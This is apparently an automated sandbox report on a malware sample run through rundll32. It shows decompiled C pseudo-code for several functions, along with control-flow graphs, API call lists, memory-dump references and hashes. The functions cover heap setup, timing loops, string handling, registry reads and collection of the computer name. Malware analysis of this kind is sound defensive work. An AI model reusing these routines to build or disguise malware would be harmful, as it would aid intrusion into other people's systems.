                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04BF4AB5), ref: 04BF6D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: 46a8eaa21752c6003068b295751851f6abfa8f7b2715fa5ad690a9b69a7abcf9
                                          • Instruction ID: b798cb5657bf649cf9cd4f6464ca42efd2ca01cc013f80519f122342135b5b45
                                          • Opcode Fuzzy Hash: 46a8eaa21752c6003068b295751851f6abfa8f7b2715fa5ad690a9b69a7abcf9
                                          • Instruction Fuzzy Hash: 1E418F72604305AFE710AFA4DC84D6FB7ECEF48604F0049AABA8DD7110D675ED0D9BA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF4FFA, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 350 4bf4ffa-4bf503c 352 4bf50c3-4bf50c9 350->352 353 4bf5042-4bf504b 350->353 354 4bf504d-4bf505e SysAllocString 353->354 355 4bf508c-4bf508f 353->355 356 4bf5069-4bf5081 354->356 357 4bf5060-4bf5067 354->357 358 4bf50ed 355->358 359 4bf5091-4bf50a1 SysAllocString 355->359 366 4bf5085-4bf508a 356->366 361 4bf50b5-4bf50b8 357->361 360 4bf50ef-4bf50f2 358->360 362 4bf50cc-4bf50eb 359->362 363 4bf50a3 359->363 364 4bf50aa-4bf50ac 360->364 365 4bf50f4-4bf5101 360->365 361->352 367 4bf50ba-4bf50bd SysFreeString 361->367 362->360 363->364 364->361 368 4bf50ae-4bf50af SysFreeString 364->368 365->352 366->355 366->361 367->352 368->361
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 04BF5057
                                          • SysAllocString.OLEAUT32(04BFA6F4), ref: 04BF509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF50AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF50BD
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 35d127b1161e912562f9eb6a41809cf2810accc5d1df7c2dc9e8434bfc874e44
                                          • Instruction ID: 8176fbbff1c76d3c330b125dddb5316113a77bc157ef1df7df0294b85e138beb
                                          • Opcode Fuzzy Hash: 35d127b1161e912562f9eb6a41809cf2810accc5d1df7c2dc9e8434bfc874e44
                                          • Instruction Fuzzy Hash: CA31E071500209FFCB15DFB8D8849AE7BB9FF48300B10845AEA0A97251E775A985CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF1295, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 370 4bf1295-4bf12a9 371 4bf12ae-4bf12b3 370->371 372 4bf134a-4bf1351 371->372 373 4bf12b9-4bf12bc 371->373 374 4bf12be-4bf12d3 Sleep 373->374 375 4bf12d6-4bf12d9 373->375 374->375 375->372 376 4bf12db-4bf12e0 375->376 378 4bf133d-4bf1348 376->378 379 4bf12e2-4bf12f4 376->379 378->372 381 4bf12f6-4bf1303 lstrlenW 379->381 382 4bf1334-4bf1339 379->382 381->382 383 4bf1305-4bf1313 call 4bf58be 381->383 382->378 386 4bf1315-4bf1322 memcpy 383->386 387 4bf1324 383->387 388 4bf132b-4bf132e SysFreeString 386->388 387->388 388->382
                                          C-Code - Quality: 78%
                                          			E04BF1295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04BF58BE(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                          0x04bf12a1
                                          0x04bf12a5
                                          0x04bf12a6
                                          0x04bf12a7
                                          0x04bf12a9
                                          0x04bf12ab
                                          0x04bf12ae
                                          0x04bf12b3
                                          0x04bf134a
                                          0x04bf1351
                                          0x04bf1351
                                          0x04bf12bc
                                          0x04bf12c3
                                          0x04bf12d3
                                          0x04bf12d3
                                          0x04bf12d9
                                          0x04bf12db
                                          0x04bf12e0
                                          0x04bf12e9
                                          0x04bf12ef
                                          0x04bf12f4
                                          0x04bf12ff
                                          0x04bf1303
                                          0x04bf1305
                                          0x04bf1306
                                          0x04bf130f
                                          0x04bf1313
                                          0x04bf1324
                                          0x04bf1315
                                          0x04bf131a
                                          0x04bf131f
                                          0x04bf132e
                                          0x04bf132e
                                          0x04bf1303
                                          0x04bf1334
                                          0x04bf133a
                                          0x04bf133a
                                          0x04bf1343
                                          0x04bf1348
                                          0x04bf1348
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: e0b2f3763f989949b45addc297e6e2395fc55b4a1c42278267776d5f7f2b32c7
                                          • Instruction ID: 409b0dce9b842d8521392a5ab4e183d641a263e7e14d4cc46b4c36c5a30acb9b
                                          • Opcode Fuzzy Hash: e0b2f3763f989949b45addc297e6e2395fc55b4a1c42278267776d5f7f2b32c7
                                          • Instruction Fuzzy Hash: F6214175901209FFDB11DFA8C8849DEBBB8FF48304B1045A9EA49E7200E730EE45CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF90A1, Relevance: 6.0, APIs: 4, Instructions: 38sleepmemorythreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 389 4bf90a1-4bf90b7 HeapCreate 390 4bf90be-4bf90d4 GetTickCount call 4bf6a7f 389->390 391 4bf90b9-4bf90bc 389->391 392 4bf911c 390->392 395 4bf90d6-4bf90d7 390->395 391->392 396 4bf90d8-4bf9100 SwitchToThread call 4bf1c04 Sleep 395->396 399 4bf9102-4bf910b call 4bf9511 396->399 402 4bf910d 399->402 403 4bf9117 call 4bf4908 399->403 402->403 403->392
                                          C-Code - Quality: 100%
                                          			E04BF90A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _t5;
				void* _t7;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t15;
				signed int _t16;
				signed int _t22;

				_t16 = __edx;
				_t5 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4bfd238 = _t5;
				if(_t5 == 0) {
					_t14 = 8;
					return _t14;
				}
				 *0x4bfd1a8 = GetTickCount();
				_t7 = E04BF6A7F(_a4);
				if(_t7 == 0) {
					do {
						_t22 = SwitchToThread() + 8;
						_t10 = E04BF1C04(_a4, _t22);
						Sleep(0x20 + _t22 * 4); // executed
					} while (_t10 == 1);
					if(E04BF9511(_t15) != 0) {
						 *0x4bfd260 = 1; // executed
					}
					_t13 = E04BF4908(_t16); // executed
					return _t13;
				}
				return _t7;
			}











                                          0x04bf90a1
                                          0x04bf90aa
                                          0x04bf90b0
                                          0x04bf90b7
                                          0x04bf90bb
                                          0x00000000
                                          0x04bf90bb
                                          0x04bf90c8
                                          0x04bf90cd
                                          0x04bf90d4
                                          0x04bf90d8
                                          0x04bf90e4
                                          0x04bf90e8
                                          0x04bf90f7
                                          0x04bf90fd
                                          0x04bf910b
                                          0x04bf910d
                                          0x04bf910d
                                          0x04bf9117
                                          0x00000000
                                          0x04bf9117
                                          0x04bf911c

                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,04BF6F11,?), ref: 04BF90AA
                                          • GetTickCount.KERNEL32 ref: 04BF90BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 04BF90D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 04BF90F7
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID:
                                          • API String ID: 377297877-0
                                          • Opcode ID: 3effdb8f17562837a60fe3f9713a1ff9d44b729091628c2d00eef4b4fee37f1e
                                          • Instruction ID: 8bce156886645c4a1179dbe1faf4677521651293b626b197b44c0cce482400a0
                                          • Opcode Fuzzy Hash: 3effdb8f17562837a60fe3f9713a1ff9d44b729091628c2d00eef4b4fee37f1e
                                          • Instruction Fuzzy Hash: 99F062B1600304BAEB116F789C48B9A7AA8FF54759F104062EE0DD7240EB38E99A8675
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF68CF, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 405 4bf68cf-4bf68e9 call 4bf9138 408 4bf68ee-4bf6907 call 4bf1b13 405->408 409 4bf68eb 405->409 411 4bf690c-4bf6910 408->411 409->408 412 4bf69cf-4bf69d4 411->412 413 4bf6916-4bf6930 StrToIntExW 411->413 416 4bf69db-4bf69e1 412->416 417 4bf69d6 call 4bf568a 412->417 414 4bf69bf-4bf69c1 413->414 415 4bf6936-4bf6952 call 4bf5fcb 413->415 420 4bf69c2-4bf69cd HeapFree 414->420 415->420 422 4bf6954-4bf696d call 4bf75e7 415->422 417->416 420->412 425 4bf698f-4bf69bd call 4bf1bc1 HeapFree 422->425 426 4bf696f-4bf6976 422->426 425->420 426->425 427 4bf6978-4bf698a call 4bf75e7 426->427 427->425
                                          C-Code - Quality: 100%
                                          			E04BF68CF() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E04BF9138(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4bfd2a4; // 0x24da5a8
				_t4 = _t24 + 0x4bfede0; // 0x70d9388
				_t5 = _t24 + 0x4bfed88; // 0x4f0053
				_t26 = E04BF1B13( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4bfd2a4; // 0x24da5a8
						_t11 = _t32 + 0x4bfedd4; // 0x70d937c
						_t48 = _t11;
						_t12 = _t32 + 0x4bfed88; // 0x4f0053
						_t51 = E04BF5FCB(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0x4bfd2a4; // 0x24da5a8
							_t13 = _t35 + 0x4bfea59; // 0x30314549
							if(E04BF75E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
								_t60 =  *0x4bfd25c - 6;
								if( *0x4bfd25c <= 6) {
									_t42 =  *0x4bfd2a4; // 0x24da5a8
									_t15 = _t42 + 0x4bfec3a; // 0x52384549
									E04BF75E7(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0x4bfd2a4; // 0x24da5a8
							_t17 = _t38 + 0x4bfee18; // 0x70d93c0
							_t18 = _t38 + 0x4bfedf0; // 0x680043
							_t45 = E04BF1BC1(_v8, 0x80000001, _t51, _t18, _t17);
							HeapFree( *0x4bfd238, 0, _t51);
						}
					}
					HeapFree( *0x4bfd238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E04BF568A(_t53);
				}
				return _t45;
			}

















                                          0x04bf68df
                                          0x04bf68e2
                                          0x04bf68e9
                                          0x04bf68eb
                                          0x04bf68eb
                                          0x04bf68ee
                                          0x04bf68f3
                                          0x04bf68fa
                                          0x04bf6907
                                          0x04bf690c
                                          0x04bf6910
                                          0x04bf691e
                                          0x04bf692c
                                          0x04bf6930
                                          0x04bf69c1
                                          0x04bf69c1
                                          0x04bf6936
                                          0x04bf6936
                                          0x04bf693b
                                          0x04bf693b
                                          0x04bf6942
                                          0x04bf694e
                                          0x04bf6950
                                          0x04bf6952
                                          0x04bf6954
                                          0x04bf695b
                                          0x04bf696d
                                          0x04bf696f
                                          0x04bf6976
                                          0x04bf6978
                                          0x04bf697f
                                          0x04bf698a
                                          0x04bf698a
                                          0x04bf6976
                                          0x04bf698f
                                          0x04bf6994
                                          0x04bf699b
                                          0x04bf69b9
                                          0x04bf69bb
                                          0x04bf69bb
                                          0x04bf6952
                                          0x04bf69cd
                                          0x04bf69cd
                                          0x04bf69cf
                                          0x04bf69d4
                                          0x04bf69d6
                                          0x04bf69d6
                                          0x04bf69e1

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,070D9388,00000000,?,7519F710,00000000,7519F730), ref: 04BF691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,070D93C0,?,00000000,30314549,00000014,004F0053,070D937C), ref: 04BF69BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04BF9C10), ref: 04BF69CD
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 800365ed6c9bd4e13ea491b0d0c32f5ddb02ec36cd185c14fe2ba265c59e73b5
                                          • Instruction ID: 2fef29fe951dade3db725aa00a75cd802bf09236a5d99e31b5a395e05f40cf50
                                          • Opcode Fuzzy Hash: 800365ed6c9bd4e13ea491b0d0c32f5ddb02ec36cd185c14fe2ba265c59e73b5
                                          • Instruction Fuzzy Hash: 54316231600119BEEB119B94DC48EAA7BBDEB48704F054096B60D9B120D770EE19DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF9F11, Relevance: 4.6, APIs: 3, Instructions: 77memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04BF9F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t33 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t43 =  *0x4bfd2a4; // 0x24da5a8
				_push(0x800);
				_push(0);
				_push( *0x4bfd238);
				_t1 = _t43 + 0x4bfe791; // 0x6976612e
				_t44 = _t1;
				if( *0x4bfd24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0x4bfd24c =  *0x4bfd24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04BF7CF7(_a4, _t41); // executed
						_t19 = E04BF60CF(_t41, _t41, _t46); // executed
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0x4bfd24c < 5) {
								 *0x4bfd24c =  *0x4bfd24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E04BF6106();
						RtlFreeHeap( *0x4bfd238, 0, _t41); // executed
						goto L10;
					}
					_t25 = E04BF514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t25 = E04BF1754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}












                                          0x04bf9f11
                                          0x04bf9f11
                                          0x04bf9f14
                                          0x04bf9f15
                                          0x04bf9f1f
                                          0x04bf9f26
                                          0x04bf9f2b
                                          0x04bf9f2d
                                          0x04bf9f33
                                          0x04bf9f33
                                          0x04bf9f39
                                          0x04bf9f61
                                          0x04bf9f79
                                          0x04bf9f7b
                                          0x04bf9f7c
                                          0x04bf9f7e
                                          0x04bf9fbc
                                          0x04bf9fbc
                                          0x04bf9fc2
                                          0x04bf9fc8
                                          0x04bf9fc8
                                          0x04bf9f80
                                          0x04bf9f86
                                          0x04bf9f89
                                          0x04bf9f98
                                          0x04bf9f9a
                                          0x04bf9fa1
                                          0x04bf9fd5
                                          0x04bf9fda
                                          0x04bf9fdc
                                          0x04bf9fde
                                          0x04bf9fde
                                          0x00000000
                                          0x04bf9fdc
                                          0x04bf9fa3
                                          0x04bf9fa8
                                          0x04bf9fb6
                                          0x00000000
                                          0x04bf9fb6
                                          0x04bf9f70
                                          0x04bf9f75
                                          0x04bf9f75
                                          0x00000000
                                          0x04bf9f75
                                          0x04bf9f43
                                          0x00000000
                                          0x00000000
                                          0x04bf9f52
                                          0x00000000

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04BF9F3B
                                            • Part of subcall function 04BF1754: GetTickCount.KERNEL32 ref: 04BF1768
                                            • Part of subcall function 04BF1754: wsprintfA.USER32 ref: 04BF17B8
                                            • Part of subcall function 04BF1754: wsprintfA.USER32 ref: 04BF17D5
                                            • Part of subcall function 04BF1754: wsprintfA.USER32 ref: 04BF1801
                                            • Part of subcall function 04BF1754: HeapFree.KERNEL32(00000000,?), ref: 04BF1813
                                            • Part of subcall function 04BF1754: wsprintfA.USER32 ref: 04BF1834
                                            • Part of subcall function 04BF1754: HeapFree.KERNEL32(00000000,?), ref: 04BF1844
                                            • Part of subcall function 04BF1754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04BF1872
                                            • Part of subcall function 04BF1754: GetTickCount.KERNEL32 ref: 04BF1883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04BF9F59
                                          • RtlFreeHeap.NTDLL(00000000,?,?,?,04BF9C62,00000002,?,?,?,?), ref: 04BF9FB6
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: c38025c54a33b074ba0ec7960b208aeefe24559bc5cfc63f0cb8daf8b7ab8066
                                          • Instruction ID: 000d656eceda7568ad0c7c750b7f48664f10e55144acd9d315c8b46dd9937845
                                          • Opcode Fuzzy Hash: c38025c54a33b074ba0ec7960b208aeefe24559bc5cfc63f0cb8daf8b7ab8066
                                          • Instruction Fuzzy Hash: 8F213EB5200205EBEB119FA9DC44B9A77ACEB49344F104056FA0ED7241E774FE49DBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF642C, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E04BF642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04BF4FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4bfd2a4; // 0x24da5a8
						_t20 = _t68 + 0x4bfe1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04BF5103(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                          0x04bf6432
                                          0x04bf6435
                                          0x04bf6445
                                          0x04bf644e
                                          0x04bf6452
                                          0x04bf6520
                                          0x04bf6526
                                          0x04bf6526
                                          0x04bf646c
                                          0x04bf6471
                                          0x04bf6475
                                          0x04bf647b
                                          0x04bf6480
                                          0x04bf6487
                                          0x04bf6496
                                          0x04bf6496
                                          0x04bf649a
                                          0x04bf649c
                                          0x04bf64a8
                                          0x04bf64b3
                                          0x04bf64be
                                          0x04bf64c2
                                          0x04bf64cc
                                          0x04bf64d0
                                          0x04bf64d2
                                          0x04bf64d7
                                          0x04bf64de
                                          0x04bf64ee
                                          0x04bf64ee
                                          0x04bf64d7
                                          0x04bf64d0
                                          0x04bf64f0
                                          0x04bf64f5
                                          0x04bf64fa
                                          0x04bf64fa
                                          0x04bf64fd
                                          0x04bf6506
                                          0x04bf650b
                                          0x04bf650b
                                          0x04bf6510
                                          0x04bf6515
                                          0x04bf6515
                                          0x04bf6510
                                          0x04bf649a
                                          0x04bf6517
                                          0x04bf651d
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04BF4FFA: SysAllocString.OLEAUT32(80000002), ref: 04BF5057
                                            • Part of subcall function 04BF4FFA: SysFreeString.OLEAUT32(00000000), ref: 04BF50BD
                                          • SysFreeString.OLEAUT32(?), ref: 04BF650B
                                          • SysFreeString.OLEAUT32(04BFA6F4), ref: 04BF6515
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: fe253642279286d9dc7e9fc9b9fa031aa1251dc23fe2ca60b095c393b5249671
                                          • Instruction ID: ecc385c1567925d62e98dbeee2fdc0edf25f78304835ff6c5011ab03fc6b8cea
                                          • Opcode Fuzzy Hash: fe253642279286d9dc7e9fc9b9fa031aa1251dc23fe2ca60b095c393b5249671
                                          • Instruction Fuzzy Hash: A7314A71500159AFCB21EF68CC88C9BBB79FFC97447154698FD099B214E231ED56CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF73E9, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E04BF73E9(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04BF58BE(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04BF147E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                          0x04bf73ee
                                          0x04bf73f9
                                          0x04bf73fb
                                          0x04bf7401
                                          0x04bf7403
                                          0x04bf7408
                                          0x04bf7411
                                          0x04bf7415
                                          0x04bf741e
                                          0x04bf7422
                                          0x04bf7431
                                          0x04bf7424
                                          0x04bf7425
                                          0x04bf742a
                                          0x04bf742a
                                          0x04bf7422
                                          0x04bf7415
                                          0x04bf743a

                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04BF51DC,7519F710,00000000,?,?,04BF51DC), ref: 04BF7401
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04BF51DC,04BF51DD,?,?,04BF51DC), ref: 04BF741E
